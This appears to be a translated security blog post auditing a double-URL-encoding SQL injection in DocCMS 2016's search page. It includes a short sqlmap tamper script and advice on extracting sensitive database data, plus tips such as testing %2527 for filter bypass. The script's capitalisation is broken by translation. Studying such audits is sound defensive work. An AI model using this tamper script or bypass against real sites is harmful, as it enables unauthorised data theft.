Share an audit instance of SQL secondary code injection vulnerability, and attach the tamper script.
Doccms official website: http://www.doccms.com
Source code: doccms2016
Download address: https://pan.baidu.com/s/1plclifl
In / content / search / index.php, first, illegal character detection is performed for the parameter keyword:
Further trace the checksqlstr function to see how the code is filtered. In / Inc / function.php:
The checksqlstr function performs regular matching on the incoming string to check whether the function has illegal characters. Continue to see the get [search] result function in / content / search / index.php:
After the illegal character detection of the parameter keyword, the URL is decoded and then spliced into the SQL statement for execution. If we pass in a double URL encoded string, it will bypass illegal character detection, and then be decoded by URLDecode and carried into the database for execution, resulting in a SQL injection vulnerability.
1. Double URLEncode is bypassed by writing tamper. The tamper script is as follows:
#!/usr/bin/env python
Import re
from urllib import quote
from lib.core.data import kb
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL
def dependencies():
Pass
def tamper(payload, **kwargs):
retVal = payload
retVal = quote(quote(retVal))
return retVal
2. Load tamper script through sqlmap to obtain database sensitive data
In code audit, some encoding and decoding functions, such as urldecode(), rawurldecode(), base64 ﹐ decode(), can be used to bypass the protection.
In addition, in the actual combat, when encountering the situation of SQL and XSS secondary encoding bypassing, there are also some cases. In addition to single quotation mark and double quotation mark, we should also pay attention to% 2527 and% 2522 for testing.
Bypass
About Me
A network security enthusiast has a paranoid pursuit of technology. Committed to sharing original high-quality dry goods, including but not limited to: penetration testing, WAF bypass, code audit, security operation and maintenance.